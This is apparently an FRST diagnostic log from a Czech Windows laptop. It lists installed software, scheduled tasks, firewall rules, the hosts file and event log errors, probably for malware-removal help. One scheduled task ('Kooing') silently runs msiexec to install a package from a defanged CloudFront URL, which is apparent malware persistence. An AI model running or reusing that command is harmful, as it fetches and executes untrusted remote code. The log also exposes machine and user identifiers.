LibreOffice 5.3.2.2 (HKLM\...\{682C33C0-5D61-48F0-B0A2-1A504F4C5905}) (Version: 5.3.2.2 - The Document Foundation)
Malwarebytes verze 3.0.6.1469 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
Microsoft .NET Framework 4.6.1 (čeština) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1029) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Office 2016 pro profesionály - cs-cz (HKLM\...\ProfessionalRetail - cs-cz) (Version: 16.0.7870.2031 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Mozilla Firefox 52.0.2 (x86 cs) (HKLM-x32\...\Mozilla Firefox 52.0.2 (x86 cs)) (Version: 52.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 52.0.2 - Mozilla)
MPC-HC 1.7.11 (64-bit) (HKLM\...\{2ACBF1FA-F5C3-4B19-A774-B22A31F231B9}_is1) (Version: 1.7.11 - MPC-HC Team)
Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.3.3 - Notepad++ Team)
Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.7870.2024 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (Version: 16.0.7830.1018 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.7870.2024 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (x32 Version: 16.0.7668.2066 - Microsoft Corporation) Hidden
OpenOffice 4.1.3 (HKLM-x32\...\{7308600A-5231-459C-A3E2-A637F842CACA}) (Version: 4.13.9783 - Apache Software Foundation)
opensource (x32 Version: 1.0.14960.3876 - Your Company Name) Hidden
OpenVPN 2.4.0-I601 (HKLM\...\OpenVPN) (Version: 2.4.0-I601 - OpenVPN Technologies, Inc.)
R for Windows 3.3.3 (HKLM\...\R for Windows 3.3.3_is1) (Version: 3.3.3 - R Core Team)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.273.49 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.83.328.2014 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7383 - Realtek Semiconductor Corp.)
RStudio (HKLM-x32\...\RStudio) (Version: 1.0.136 - RStudio)
SHARP MX/MX-M Series PCL/PS Printer Driver (HKLM-x32\...\SHARP MX-2310U PCL PS Printer Driver) (Version: 1.00.000 - SHARP)
Skype™ 7.33 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.33.105 - Skype Technologies S.A.)
Spotify (HKU\S-1-5-21-3530450637-73980329-3277372514-2116\...\Spotify) (Version: 1.0.52.725.g943b26a8 - Spotify AB)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 18.1.37.3 - Synaptics Incorporated)
TAP-Windows 9.21.2 (HKLM\...\TAP-Windows) (Version: 9.21.2 - )
Validity Fingerprint Sensor Driver (HKLM\...\{ADAA7361-54B8-4FC8-804E-94EC6C11ED68}) (Version: 4.5.133.0 - Validity Sensors, Inc.)
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
XnView 2.39 (HKLM-x32\...\XnView_is1) (Version: 2.39 - Gougelet Pierre-e)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {04BA5C12-BAF4-4EBD-A8EF-F82DBD5F545F} - System32\Tasks\HPCeeScheduleForTesla => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2011-07-15] (Hewlett-Packard)
Task: {1B456DEE-D774-4AF9-99D3-BB58176C79D6} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-03-03] (Piriform Ltd)
Task: {1EA529FC-F4AC-40CF-AAAA-44CE2D029937} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-04-09] (Google Inc.)
Task: {206701A0-AE04-4CF3-9C30-05245EFAC6DD} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-12-19] (Adobe Systems Incorporated)
Task: {298035C0-1B4E-42EE-B39F-9BFC54AF00BB} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-04-09] (Google Inc.)
Task: {3E9755F7-4ED6-4AE2-92BA-3C93953815F8} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-03-26] (Microsoft Corporation)
Task: {412A5668-020A-4A96-864C-B1EAD4DF5506} - System32\Tasks\COMODO\COMODO Signature Update {B9D5C6F9-17D2-4917-8BD0-614BAA1C6A59} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2017-04-05] (COMODO)
Task: {49947075-E002-47CD-86BC-876EF7EE9462} - System32\Tasks\COMODO\COMODO Scan {F140D794-60B6-4F00-9235-D6457AA25B22} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2017-04-05] (COMODO)
Task: {4E430254-74CA-4CBF-BBA2-802F494562F2} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe [2017-03-24] (HP Inc.)
Task: {5A08501B-4BB0-4536-8B76-EE21CFC00C17} - System32\Tasks\Rqutyaninit Agent => C:\Program Files (x86)\Dermupy\xrehege.exe [2017-04-08] (Glarysoft Ltd)
Task: {5E025B86-D01E-4509-BAAA-D935012420D4} - System32\Tasks\Kooing => "msiexec" /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=SAMSUNGXMZ7TE256HMHP-000H1_S1BCNSAG422524&d=20170408 /q
Task: {66D7A763-CBC8-45D2-861F-06D6ADB1023C} - System32\Tasks\COMODO\COMODO Update {A6D52E4F-569B-4756-B3D8-DF217313DA85} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2017-04-05] (COMODO)
Task: {6E227349-115E-4840-BEB6-F87CA916C746} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-03-26] (Microsoft Corporation)
Task: {73B297B2-38C6-4D86-BF1B-55C2B7A47EDD} - System32\Tasks\COMODO\COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10} => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [2017-04-05] (COMODO)
Task: {9783580B-CC8C-41E9-A1AF-A722FCA417C1} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2014-08-22] (Hewlett-Packard Company)
Task: {97D99300-99B3-4BB5-A195-A8FA15DCF8F3} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2016-12-07] (HP Inc.)
Task: {C18F6609-E0A7-477A-A19E-0009771073B4} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2017-04-08] (Dropbox, Inc.)
Task: {DE0D7CA5-319E-4E5E-9C2C-3EC89140DC4B} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2017-04-08] (Dropbox, Inc.)
Task: {E4EA4D7B-5C4B-4ECC-A80A-173712BC72F6} - System32\Tasks\COMODO\COMODO CMC {06A09C0F-DD9C-4191-A670-71115CD78627} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2017-04-05] (COMODO)
Task: {EC3E2758-4E4F-4418-AB35-9444272B33AE} - System32\Tasks\Registration => C:\Program Files (x86)\Hewlett-Packard\HP Setup\Dependencies\RemEngine.exe [2012-03-21] ()
Task: {F1EB4BF2-716A-4EE9-A57E-E087895844FC} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2014-08-22] (Hewlett-Packard Company)
Task: {F9AA78BE-6850-42D5-BA29-37D6F4B6E3C5} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPSFReport.exe [2016-02-18] (Hewlett-Packard)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\HPCeeScheduleForTesla.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

ShortcutWithArgument: C:\Users\Tesla\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\9501e18d7c2ab92e\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 2"
ShortcutWithArgument: C:\Users\Tesla\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 1"
ShortcutWithArgument: C:\Users\Tesla\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=ChromeDefaultData

==================== Loaded Modules (Whitelisted) ==============

2016-12-28 01:16 - 2017-04-05 07:57 - 00107200 _____ () C:\Program Files\COMODO\COMODO Internet Security\cavwpps.dll
2016-12-28 01:16 - 2017-04-05 07:57 - 00244928 _____ () C:\Program Files\COMODO\COMODO Internet Security\cmdcomps.dll
2014-05-28 18:14 - 2014-05-28 18:14 - 00336056 _____ () c:\Program Files\Hewlett-Packard\Pre-Boot Security for HP ProtectTools\BIOSDomainPlugin.dll
2014-03-31 22:28 - 2014-03-31 22:28 - 00007168 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Theft Recovery\CtService.exe
2014-08-14 18:28 - 2014-08-14 18:28 - 00209712 _____ () c:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\iSCTAgent.exe
2014-08-14 18:28 - 2014-08-14 18:28 - 00057648 _____ () c:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\NetworkHeuristic.dll
2014-08-14 18:28 - 2014-08-14 18:28 - 00037168 _____ () c:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\ISCTNetMon.dll
2014-08-14 18:28 - 2014-08-14 18:28 - 00057648 _____ () c:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\ISCTEncryptionCheck.dll
2016-03-16 11:25 - 2016-03-16 11:25 - 00073912 _____ () C:\Program Files\COMODO\COMODO Internet Security\scanners\smart.cav
2014-10-28 12:49 - 2015-09-15 22:56 - 00405416 _____ () C:\Windows\system32\igfxTray.exe
2017-04-09 20:51 - 2017-03-29 10:47 - 02885464 _____ () C:\Program Files (x86)\Google\Chrome\Application\57.0.2987.133\libglesv2.dll
2017-04-09 20:51 - 2017-03-29 10:47 - 00099672 _____ () C:\Program Files (x86)\Google\Chrome\Application\57.0.2987.133\libegl.dll
2014-10-10 18:37 - 2014-10-10 18:37 - 01243936 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
2014-03-19 17:00 - 2014-03-19 17:00 - 00514570 _____ () c:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\sqlite3.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 04:34 - 2017-02-02 16:37 - 00000850 ____A C:\Windows\system32\Drivers\etc\hosts

192.168.1.1 evi.ceda.cz

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3530450637-73980329-3277372514-2116\Control Panel\Desktop\\Wallpaper -> C:\Users\Tesla\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 213.46.172.36 - 213.46.172.37
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{46CA5EBA-DA2B-4090-A589-88BB5AA5DCCC}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
FirewallRules: [{5A44D144-43F1-4F46-89CE-1D768A3EF32E}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{EBC32DEF-5E1D-468B-8ED8-269B4CDD42DC}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{82FA12B5-5478-4951-B377-54110ABDECA3}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{54B704A2-2400-48C8-A221-4AACF32D1AC0}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{3CBCF809-AAF9-4F6D-8F9B-DD206AEA2A3D}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{BC3BD4F7-394A-46BB-877E-61E3BC3DDBE1}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12.exe
FirewallRules: [{8C3849D0-AFC9-48E8-8377-4BECB9C97A06}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12ML.exe
FirewallRules: [{D8447F41-1819-4DB7-95B3-1E2263285B1D}] => (Allow) C:\Program Files\Intel Corporation\Intel WiDi\WiDiApp.exe
FirewallRules: [{69E93BAE-AF2E-4D90-9A78-488F941C442F}] => (Allow) C:\Program Files\Intel Corporation\USB over IP\bin\UoipService.exe
FirewallRules: [{CCC78DAC-CFCD-4ACC-8E56-2EAF3339F948}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [TCP Query User{93CDD671-DA31-4E6A-AEED-9C529CF920A0}C:\program files\openvpn\bin\openvpn.exe] => (Allow) C:\program files\openvpn\bin\openvpn.exe
FirewallRules: [UDP Query User{B6F23E0D-DFD0-4450-BC1F-3215C28B559E}C:\program files\openvpn\bin\openvpn.exe] => (Allow) C:\program files\openvpn\bin\openvpn.exe
FirewallRules: [TCP Query User{F59FA78B-BE6E-47C5-BFF1-C6C4500450DE}C:\program files\openvpn\bin\openvpn.exe] => (Allow) C:\program files\openvpn\bin\openvpn.exe
FirewallRules: [UDP Query User{74B80A01-C561-4903-B419-DADAC20AF146}C:\program files\openvpn\bin\openvpn.exe] => (Allow) C:\program files\openvpn\bin\openvpn.exe
FirewallRules: [TCP Query User{DB7A4B20-8023-4368-9EB8-AFE393F66743}C:\users\tesla\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\tesla\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{7C00FB1B-D86A-473D-B40A-B2675E8DE8A9}C:\users\tesla\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\tesla\appdata\roaming\spotify\spotify.exe
FirewallRules: [{B7B97855-2BDD-41C3-B09B-175D9878DCFE}] => (Block) C:\users\tesla\appdata\roaming\spotify\spotify.exe
FirewallRules: [{0CB41088-2E09-4761-BC35-630116776D1B}] => (Block) C:\users\tesla\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{908F4F28-2DEF-491F-AED7-D46E48D16863}C:\users\tesla\data\blizzard\hearthstone\hearthstone.exe] => (Allow) C:\users\tesla\data\blizzard\hearthstone\hearthstone.exe
FirewallRules: [UDP Query User{4AF58F00-F84A-4EA1-9168-5D219048B773}C:\users\tesla\data\blizzard\hearthstone\hearthstone.exe] => (Allow) C:\users\tesla\data\blizzard\hearthstone\hearthstone.exe
FirewallRules: [{C2190BD4-4CB4-4732-A16B-996922ACE712}] => (Block) C:\users\tesla\data\blizzard\hearthstone\hearthstone.exe
FirewallRules: [{9F9B37D3-661D-4E23-8A59-D8DF20B18C0C}] => (Block) C:\users\tesla\data\blizzard\hearthstone\hearthstone.exe
FirewallRules: [{429734EA-51CB-45ED-AA77-3D041F089374}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
FirewallRules: [{8DB0FB09-045C-4B8A-8A51-3D12E94268A1}] => (Allow) C:\Users\Tesla\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{86EE8CC6-E479-43F9-9292-99880301813D}] => (Allow) C:\Users\Tesla\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{FD7B850A-7918-4E95-B82D-3CFE8AA78A5D}] => (Allow) C:\Users\Tesla\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{C167E950-A8DB-4209-8519-5FCF6A1D6097}] => (Allow) C:\Users\Tesla\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{B5CA96D6-609F-4E33-BD6D-84E22002E54C}] => (Allow) C:\Users\Tesla\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{1395CCE0-3940-4D81-98BF-F823AEE32B1D}] => (Allow) C:\Users\Tesla\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{758D18CE-4984-4537-B722-F134F023F135}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{691D7F8D-CD47-4D2A-9714-622C863D2EA3}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{876A00E7-4EFC-400C-ACC8-10CA0B4FEAA5}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

==================== Restore Points =========================

09-04-2017 11:48:38 Windows Update

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (04/09/2017 09:06:17 PM) (Source: flcdlock) (EventID: 1067) (User: )
Description: Při získávání nastavení přístupu místního počítače došlo k chybě.


Kód systémové chyby je 0x54b:-

Zadaná doména neexistuje nebo není k dispozici.

Error: (04/09/2017 09:05:15 PM) (Source: flcdlock) (EventID: 1067) (User: )
Description: Při získávání nastavení přístupu místního počítače došlo k chybě.


Kód systémové chyby je 0x54b:-

Zadaná doména neexistuje nebo není k dispozici.

Error: (04/09/2017 09:04:13 PM) (Source: flcdlock) (EventID: 1067) (User: )
Description: Při získávání nastavení přístupu místního počítače došlo k chybě.


Kód systémové chyby je 0x54b:-

Zadaná doména neexistuje nebo není k dispozici.

Error: (04/09/2017 09:03:10 PM) (Source: flcdlock) (EventID: 1067) (User: )
Description: Při získávání nastavení přístupu místního počítače došlo k chybě.


Kód systémové chyby je 0x54b:-

Zadaná doména neexistuje nebo není k dispozici.

Error: (04/09/2017 09:02:08 PM) (Source: flcdlock) (EventID: 1067) (User: )
Description: Při získávání nastavení přístupu místního počítače došlo k chybě.


Kód systémové chyby je 0x54b:-

Zadaná doména neexistuje nebo není k dispozici.

Error: (04/09/2017 09:01:08 PM) (Source: flcdlock) (EventID: 1067) (User: )
Description: Při získávání nastavení přístupu místního počítače došlo k chybě.


Kód systémové chyby je 0x54b:-

Zadaná doména neexistuje nebo není k dispozici.

Error: (04/09/2017 09:00:08 PM) (Source: flcdlock) (EventID: 1067) (User: )
Description: Při získávání nastavení přístupu místního počítače došlo k chybě.


Kód systémové chyby je 0x54b:-

Zadaná doména neexistuje nebo není k dispozici.

Error: (04/09/2017 08:59:27 PM) (Source: flcdlock) (EventID: 1069) (User: )
Description: Aktuální operace profilu SID selhala s neznámou výjimkou.

Error: (04/09/2017 08:59:26 PM) (Source: flcdlock) (EventID: 1067) (User: )
Description: Při získávání nastavení přístupu místního počítače došlo k chybě.


Kód systémové chyby je 0x54b:-

Zadaná doména neexistuje nebo není k dispozici.

Error: (04/09/2017 08:59:24 PM) (Source: openvpnserv) (EventID: 0) (User: )
Description: Event-ID 0


System errors:
=============
Error: (04/09/2017 09:00:07 PM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1129) (User: CEDA)
Description: Zpracování zásad skupiny selhalo v důsledku toho, že se nebylo v síti možné připojit k řadiči domény. Může se jednat o přechodný stav. Po připojení počítače k řadiči domény a úspěšném zpracování zásad skupiny bude odeslána zpráva o úspěšné provedení těchto akcí. Pokud se tato zpráva nezobrazí během několika hodin, obraťte se na správce.

Error: (04/09/2017 08:59:25 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Zavedení následujícího ovladače pro spouštění počítače nebo systému se nezdařilo:
cdrom

Error: (04/09/2017 08:59:23 PM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1055) (User: NT AUTHORITY)
Description: Zpracování zásad skupiny selhalo. Systém Windows nerozpoznal název počítače. Může to být způsobeno jedním nebo více z následujících důvodů:
a) Selhal překlad IP adres v aktuálním řadiči domény.
b) Čekací doba replikace služby Active Directory (účet vytvořený na jiném řadiči domény nebyl replikován na aktuální řadič domény).

Error: (04/09/2017 08:59:23 PM) (Source: NETLOGON) (EventID: 5719) (User: )
Description: Tento počítač nemohl nastavit zabezpečenou relaci s řadičem
domény v doméně CEDA z následujícího důvodu:
Pro vyřízení žádosti o přihlášení nejsou nyní k dispozici žádné přihlašovací servery.


To může vést k potížím při ověřování. Přesvědčte se, zda je tento
počítač připojen k síti. Pokud potíže trvají,
obraťte se na správce domény.



DALŠÍ INFORMACE

Pokud je tento počítač řadičem domény pro určenou doménu,
nastaví zabezpečenou relaci s emulátorem primárního řadiče domény v určené
doméně. V opačném případě tento počítač nastaví zabezpečenou relaci s libovolným řadičem domény
v určené doméně.

Error: (04/09/2017 08:51:02 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: Správce služeb se pokusil o opravnou akci (Restartovat službu) po nečekaném ukončení služby Windows Search, ale tato akce selhala kvůli následující chybě:
Instance této služby je již spuštěna.

Error: (04/09/2017 08:50:32 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Služba Windows Search byla nečekaně ukončena. Stalo se to 1 krát. Následující opravná akce bude spuštěna za 30000 milisekund: Restartovat službu.

Error: (04/09/2017 08:50:32 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: Služba Windows Search ukončena s chybou %%-1073473535, specifickou pro službu.

Error: (04/09/2017 08:50:27 PM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1129) (User: CEDA)
Description: Zpracování zásad skupiny selhalo v důsledku toho, že se nebylo v síti možné připojit k řadiči domény. Může se jednat o přechodný stav. Po připojení počítače k řadiči domény a úspěšném zpracování zásad skupiny bude odeslána zpráva o úspěšné provedení těchto akcí. Pokud se tato zpráva nezobrazí během několika hodin, obraťte se na správce.

Error: (04/09/2017 08:49:26 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Zavedení následujícího ovladače pro spouštění počítače nebo systému se nezdařilo:
cdrom

Error: (04/09/2017 08:49:24 PM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1055) (User: NT AUTHORITY)
Description: Zpracování zásad skupiny selhalo. Systém Windows nerozpoznal název počítače. Může to být způsobeno jedním nebo více z následujících důvodů:
a) Selhal překlad IP adres v aktuálním řadiči domény.
b) Čekací doba replikace služby Active Directory (účet vytvořený na jiném řadiči domény nebyl replikován na aktuální řadič domény).


CodeIntegrity:
===================================
Date: 2017-04-09 20:59:22.000
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\api-ms-win-core-synch-l1-2-0.dll because the set of per-page image hashes could not be found on the system.

Date: 2017-04-09 20:59:21.969
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\api-ms-win-core-synch-l1-2-0.dll because the set of per-page image hashes could not be found on the system.

Date: 2017-04-09 20:49:23.236
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\api-ms-win-core-synch-l1-2-0.dll because the set of per-page image hashes could not be found on the system.

Date: 2017-04-09 20:49:23.204
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\api-ms-win-core-synch-l1-2-0.dll because the set of per-page image hashes could not be found on the system.

Date: 2017-04-09 20:29:50.094
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\api-ms-win-core-synch-l1-2-0.dll because the set of per-page image hashes could not be found on the system.

Date: 2017-04-09 20:29:50.078
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\api-ms-win-core-synch-l1-2-0.dll because the set of per-page image hashes could not be found on the system.

Date: 2017-04-09 16:45:27.192
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\api-ms-win-core-synch-l1-2-0.dll because the set of per-page image hashes could not be found on the system.

Date: 2017-04-09 16:45:27.165
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\api-ms-win-core-synch-l1-2-0.dll because the set of per-page image hashes could not be found on the system.

Date: 2017-04-09 14:26:25.197
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\api-ms-win-core-synch-l1-2-0.dll because the set of per-page image hashes could not be found on the system.

Date: 2017-04-09 14:26:25.119
